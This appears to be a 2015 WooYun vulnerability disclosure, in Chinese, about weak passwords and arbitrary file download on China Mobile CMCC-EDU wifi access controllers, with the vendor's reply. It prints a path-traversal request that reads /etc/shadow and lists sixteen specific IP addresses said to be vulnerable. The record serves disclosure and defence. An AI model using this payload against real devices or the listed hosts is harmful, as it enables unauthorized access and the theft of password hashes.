当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113380

漏洞标题:中国移动大量AC可被控制外加任意文件下载(CMCC-EDU wifi)

相关厂商:中国移动

漏洞作者: 路人甲

提交时间:2015-05-12 11:06

修复时间:2015-08-13 17:54

公开时间:2015-08-13 17:54

漏洞类型:默认配置不当

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-12: 细节已通知厂商并且等待厂商处理中
2015-05-15: 厂商已经确认,细节仅向厂商公开
2015-05-18: 细节向第三方安全合作伙伴开放
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

弱口令,任意文件读取

详细说明:

AC 弱口令

1.png


是中国移动的设备 CMCC-EDU

2.png


任意文件下载

DownloadServlet?fileName=../../../../../../../../../../etc/shadow


通用,这个型号的AC都可以任意下载shadow

3.png

4.png

漏洞证明:

这部分IP全部有弱口令,和任意下载漏洞
http://111.9.11.67
http://111.9.11.2
http://111.9.11.46
http://111.9.11.62
http://111.9.11.6
http://111.9.11.58
http://111.9.11.51
http://111.9.11.50
http://111.9.11.43
http://111.9.11.38
http://111.9.11.30
http://111.9.11.26
http://111.9.11.22
http://111.9.11.18
http://111.9.11.14
http://111.9.11.11

修复方案:

你懂的

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-15 17:53

厂商回复:

CNVD未复现所述情况(应为历史测试结果,中国移动已修复),已经转由CNCERT直接向中国移动集团公司转报,供其核查参考。

最新状态:

暂无